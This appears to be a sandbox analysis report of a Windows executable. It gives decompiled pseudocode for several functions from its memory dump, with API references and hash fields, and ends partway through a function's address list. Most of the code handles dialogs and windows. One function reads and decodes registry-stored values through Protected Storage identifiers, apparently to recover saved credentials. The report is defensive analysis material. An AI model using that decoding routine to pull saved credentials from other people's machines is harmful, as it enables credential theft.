				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x413320;
				E00408572(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B5B(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B5B(_t22);
					_push(_t22);
					L004115D6();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B5B(_t23);
					_push(_t23);
					L004115D6();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B5B(_t24);
					_push(_t24);
					L004115D6();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}

0x004085d8
0x004085db
0x004085e1
0x004085e6
0x004085eb
0x004085ed
0x004085f2
0x004085f3
0x004085f8
0x004085f9
0x004085fe
0x00408600
0x00408605
0x00408606
0x0040860b
0x0040860c
0x00408611
0x00408613
0x00408618
0x00408619
0x0040861e
0x0040861f
0x00408624
0x00408626
0x0040862b
0x0040862c
0x00408631
0x00408632
0x0040863c
0x00408640
0x00408646

APIs

Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD

??3@YAXPAX@Z.MSVCRT ref: 004085F3
??3@YAXPAX@Z.MSVCRT ref: 00408606
??3@YAXPAX@Z.MSVCRT ref: 00408619
??3@YAXPAX@Z.MSVCRT ref: 0040862C
free.MSVCRT(00000000), ref: 00408640

Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040E81A, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040E4A4(__ecx, __ecx, __eflags);
					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E004015AE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, GetSysColor(5));
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(5);
				}
			}

0x0040e81a
0x0040e820
0x0040e826
0x0040e828
0x0040e871
0x0040e879
0x0040e87f
0x00000000
0x0040e88a
0x0040e82d
0x00000000
0x0040e83c
0x0040e841
0x0040e853
0x0040e861
0x00000000
0x0040e869

APIs

Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316

SetBkMode.GDI32(?,00000001), ref: 0040E841
GetSysColor.USER32(00000005), ref: 0040E849
SetBkColor.GDI32(?,00000000), ref: 0040E853
SetTextColor.GDI32(?,00C00000), ref: 0040E861
GetSysColorBrush.USER32(00000005), ref: 0040E869

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Color$BrushClassModeNameText_stricmpmemset
String ID:
API String ID: 1869857563-0
Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B105, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AE70(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
						_t54 = E0040ADB3(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A27F(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AD9D(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x413560;
						E00401000(_t93,  &_v520, 0x412404);
						E00401000(_t93,  &_v265, 0x412440);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E00401540(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x413560
						_t54 = E0040143D(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AD38(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040AC8A(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A27F(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A27F(0, _t93, _t104, 0);
								E0040A437(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x412ff4;
								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x412ff4;
								_t54 = E0040143D( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E00408654(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}

0x0040b105
0x0040b114
0x0040b11a
0x0040b11c
0x0040b120
0x0040b12d
0x0040b136
0x0040b13e
0x0040b13e
0x0040b144
0x0040b149
0x0040b14b
0x0040b14b
0x0040b150
0x0040b155
0x0040b157
0x0040b157
0x0040b15c
0x0040b161
0x0040b165
0x0040b165
0x0040b170
0x0040b178
0x0040b17e
0x0040b17e
0x0040b189
0x0040b18d
0x0040b18d
0x0040b198
0x0040b1a3
0x0040b1ab
0x0040b1bc
0x0040b1c1
0x0040b1c5
0x0040b1cf
0x0040b1d2
0x0040b1d3
0x0040b1e4
0x0040b1ea
0x0040b1ee
0x0040b1f3
0x0040b1f3
0x0040b1f5
0x0040b1f9
0x0040b1fe
0x0040b202
0x0040b202
0x0040b20c
0x0040b23d
0x0040b23d
0x0040b242
0x0040b268
0x0040b268
0x0040b26d
0x0040b271
0x0040b271
0x0040b276
0x0040b27b
0x0040b27d
0x0040b285
0x0040b28b
0x0040b29d
0x0040b29e
0x0040b2a3
0x0040b2a3
0x0040b2a3
0x0040b2a5
0x0040b2ab
0x0040b2b0
0x0040b2b0
0x0040b2b5
0x0040b2bb
0x0040b2c3
0x0040b2c7
0x0040b2c9
0x0040b2ce
0x0040b2e1
0x0040b2e1
0x0040b2e7
0x0040b2ed
0x0040b2f3
0x0040b2f3
0x0040b2f8
0x0040b2fe
0x0040b306
0x0040b30f
0x0040b329
0x0040b330
0x0040b334
0x0040b339
0x0040b339
0x0040b33d
0x0040b343
0x0040b34b
0x0040b34b
0x0040b350
0x0040b356
0x0040b364
0x0040b364
0x00000000
0x0040b356
0x0040b244
0x0040b24a
0x0040b250
0x0040b263
0x00000000
0x0040b263
0x0040b252
0x0040b257
0x00000000
0x0040b20e
0x0040b20e
0x0040b21a
0x0040b238
0x00000000
0x0040b238
0x0040b21c
0x0040b221
0x0040b226
0x0040b226
0x0040b228
0x00000000
0x0040b228
0x0040b369
0x0040b369
0x0040b36f
0x0040b36f

APIs

DestroyWindow.USER32(?), ref: 0040B13E
SetFocus.USER32(?,?,?), ref: 0040B1E4
InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1

Strings

`5A, xrefs: 0040B1EA

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DestroyFocusInvalidateRectWindow
String ID: `5A
API String ID: 3502187192-343712130
Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E

Uniqueness

Uniqueness Score: -1.00%

Function 00405CEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							E0040173B(__ecx + 0xc);
						}
					} else {
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
					E0040169B(_t58, _v8, 1, 1, 1, 0);
					E0040169B(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E004015AE(_t66, _a4, _a8, _a12);
			}

0x00405cf1
0x00405cf2
0x00405cf9
0x00405cfb
0x00405cfe
0x00405df3
0x00405e0c
0x00405e11
0x00405e11
0x00405df5
0x00405df5
0x00405df8
0x00405dff
0x00405dff
0x00405d04
0x00405d07
0x00405d0f
0x00405d1d
0x00405d23
0x00405d35
0x00405d47
0x00405d59
0x00405d6b
0x00405d7d
0x00405d8f
0x00405da1
0x00405db3
0x00405dc1
0x00405dd0
0x00405dd8
0x00405de3
0x00405de9
0x00405dec
0x00405e29

APIs

BeginDeferWindowPos.USER32 ref: 00405D07

Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727

EndDeferWindowPos.USER32(?), ref: 00405DD8
InvalidateRect.USER32(?,?,00000001), ref: 00405DE3

Strings

$, xrefs: 00405DEF

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401085(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x417388 != 0) {
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}

0x00401098
0x004010a4
0x004010bd
0x004010c3
0x004010cc
0x00000000
0x004010e0
0x004010e4

APIs

Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB

CreateFontIndirectA.GDI32(?), ref: 004010A4
SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0

Strings

MS Sans Serif, xrefs: 00401090

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
String ID: MS Sans Serif
API String ID: 4251605573-168460110
Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD0B, Relevance: 6.3, APIs: 5, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BD0B(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040BD8A(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040BD8A(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}

0x0040bd0b
0x0040bd13
0x0040bd14
0x0040bd16
0x0040bd1a
0x0040bd1d
0x0040bd1f
0x0040bd23
0x0040bd52
0x0040bd25
0x0040bd2a
0x0040bd2f
0x0040bd36
0x0040bd40
0x0040bd48
0x0040bd5d
0x0040bd63
0x0040bd6b
0x0040bd77
0x0040bd89

APIs

memset.MSVCRT ref: 0040BD2A
memset.MSVCRT ref: 0040BD40
memset.MSVCRT ref: 0040BD52
memcpy.MSVCRT ref: 0040BD77
memset.MSVCRT ref: 0040BD81

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C

Uniqueness

Uniqueness Score: -1.00%

Function 0040246C, Relevance: 6.1, APIs: 4, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void _v2058;
				char _v2060;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v3086;
				signed char _v3090;
				char _v3091;
				char _v3092;
				char* _v3096;
				char _v3100;
				short* _v3104;
				int _v3108;
				char _v3112;
				void* __ebx;
				void* _t49;
				signed int _t61;
				short* _t76;
				void* _t83;
				signed int _t87;
				void* _t90;

				_t83 = __eax;
				_t73 = 0;
				 *_a12 = 0;
				_v3112 = 0x400;
				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
				if(_t49 == 0) {
					_v2069 = 0;
					_v2070 = 0;
					_v2071 = 0;
					_v2072 = 0;
					if(_v3092 != 1) {
						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
							_v3100 = _v3112 - 1;
							_v3096 =  &_v3091;
							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
								LocalFree(_v3104);
							}
						}
					} else {
						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
							if(_a16 == 0) {
								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
							} else {
								_v2060 = 0;
								memset( &_v2058, 0, 0x800);
								_t90 = _t90 + 0xc;
								_t76 =  &_v2060;
								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
							}
							_t73 = 0;
						}
						_t79 = _a12;
						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
							_t61 = _v3090 & 0x000000ff;
							if(_t61 > 1 && _v3112 >= _t61 + 6) {
								E00401DFD(_t79,  &_v3086, _t61);
							}
						}
					}
				}
				return 0 |  *_a12 != _t73;
			}

0x0040247a
0x0040247f
0x00402481
0x00402490
0x0040249b
0x004024a0
0x004024a5
0x004024b0
0x004024b7
0x004024be
0x004024c5
0x004024cc
0x0040259e
0x004025ad
0x004025b5
0x004025d1
0x004025e4
0x004025ee
0x004025ee
0x004025d1
0x004024d2
0x004024d8
0x004024dd
0x00402546
0x004024df
0x004024ed
0x004024f5
0x004024fa
0x00402510
0x00402517
0x0040252c
0x0040252c
0x0040254b
0x0040254b
0x0040254d
0x00402552
0x00402575
0x0040257d
0x0040258f
0x00402594
0x0040257d
0x00402552
0x004024cc
0x00402603

APIs

Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
memset.MSVCRT ref: 004024F5

Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
LocalFree.KERNEL32(?), ref: 004025EE

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
String ID:
API String ID: 3503910906-0
Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00406C87, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406C87(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				void* _t65;
				intOrPtr _t73;
				void* _t76;
				void* _t79;
				char _t83;
				signed int _t95;
				intOrPtr _t96;
				void** _t98;
				intOrPtr* _t100;
				intOrPtr _t101;
				signed int _t103;

				_t95 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v28 = 1;
				_v24 = 0;
				_v40 = 0;
				_v52 = 0;
				_v48 = 0;
				_v36 = 0x100;
				_v44 = 0;
				E00406A4E(_a4);
				_t100 = _a8;
				if( *_t100 == 0) {
					L26:
					_t101 = _a4;
					L27:
					_t96 =  *((intOrPtr*)(_t101 + 0x1c));
					 *((intOrPtr*)(_t101 + 0x30)) = _t96;
					E00406B5B( &_v52);
					return _t96;
				} else {
					goto L1;
				}
				do {
					L1:
					_t87 = _v16 + _t100;
					_t65 =  *_t87;
					_v32 = _t87;
					if(_t65 != 0x20 || _v24 != 0) {
						if(_t65 != 0x22) {
							if(_t95 != 0) {
								L19:
								_v8 =  *_t87;
								E00406B25( &_v52, _t95);
								_t87 = _v8;
								 *((char*)(_v52 + _t95)) = _v8;
								_t95 = _t95 + 1;
								_v12 = _t95;
								L20:
								_v28 = 0;
								goto L21;
							}
							if(_t65 == 0x20) {
								goto L20;
							}
							_t98 = _a4 + 0x20;
							if(_v20 >= 0) {
								_t103 = _v20;
								_t76 = _t98[2];
								if(_t103 != 0xffffffff) {
									E004060FA( &(_t98[1]), _t103, _t98, 4, _t76);
								} else {
									free( *_t98);
								}
								_t79 = _t103 + 1;
								if(_t98[3] < _t79) {
									_t98[3] = _t79;
								}
								 *((intOrPtr*)( *_t98 + _t103 * 4)) = _v16;
								_t100 = _a8;
								_t87 = _v32;
							}
							_t95 = _v12;
							goto L19;
						}
						_v24 = _v24 ^ 0x00000001;
						goto L20;
					} else {
						if(_v28 == 0) {
							E00406B25( &_v52, _t95);
							_t83 = _v52;
							 *((char*)(_t83 + _t95)) = 0;
							if(_t83 == 0) {
								_t83 = 0x412466;
							}
							E00406A74(_a4, _t87, _t83);
							_v20 = _v20 + 1;
							_v28 = 1;
							_v12 = 0;
							_t95 = 0;
						}
					}
					L21:
					_v16 = _v16 + 1;
				} while ( *((intOrPtr*)(_v16 + _t100)) != 0);
				if(_t95 <= 0) {
					goto L26;
				}
				E00406B25( &_v52, _t95);
				_t73 = _v52;
				 *((char*)(_t73 + _t95)) = 0;
				if(_t73 == 0) {
					_t73 = 0x412466;
				}
				_t101 = _a4;
				E00406A74(_t101, _t87, _t73);
				goto L27;
			}

0x00406c95
0x00406c97
0x00406c9a
0x00406c9d
0x00406ca0
0x00406ca7
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cba
0x00406cbd
0x00406cc2
0x00406cc7
0x00406dd1
0x00406dd1
0x00406dd4
0x00406dd4
0x00406dd7
0x00406ddd
0x00406de8
0x00000000
0x00000000
0x00000000
0x00406ccd
0x00406ccd
0x00406cd0
0x00406cd3
0x00406cd7
0x00406cda
0x00406d1f
0x00406d29
0x00406d79
0x00406d7b
0x00406d83
0x00406d8b
0x00406d8e
0x00406d91
0x00406d92
0x00406d95
0x00406d95
0x00000000
0x00406d95
0x00406d2d
0x00000000
0x00000000
0x00406d32
0x00406d38
0x00406d3a
0x00406d40
0x00406d43
0x00406d56
0x00406d45
0x00406d47
0x00406d47
0x00406d5c
0x00406d63
0x00406d65
0x00406d65
0x00406d6d
0x00406d70
0x00406d73
0x00406d73
0x00406d76
0x00000000
0x00406d76
0x00406d21
0x00000000
0x00406ce1
0x00406ce4
0x00406cef
0x00406cf4
0x00406cf9
0x00406cfc
0x00406cfe
0x00406cfe
0x00406d07
0x00406d0c
0x00406d0f
0x00406d16
0x00406d19
0x00406d19
0x00406ce4
0x00406d98
0x00406d98
0x00406d9e
0x00406da9
0x00000000
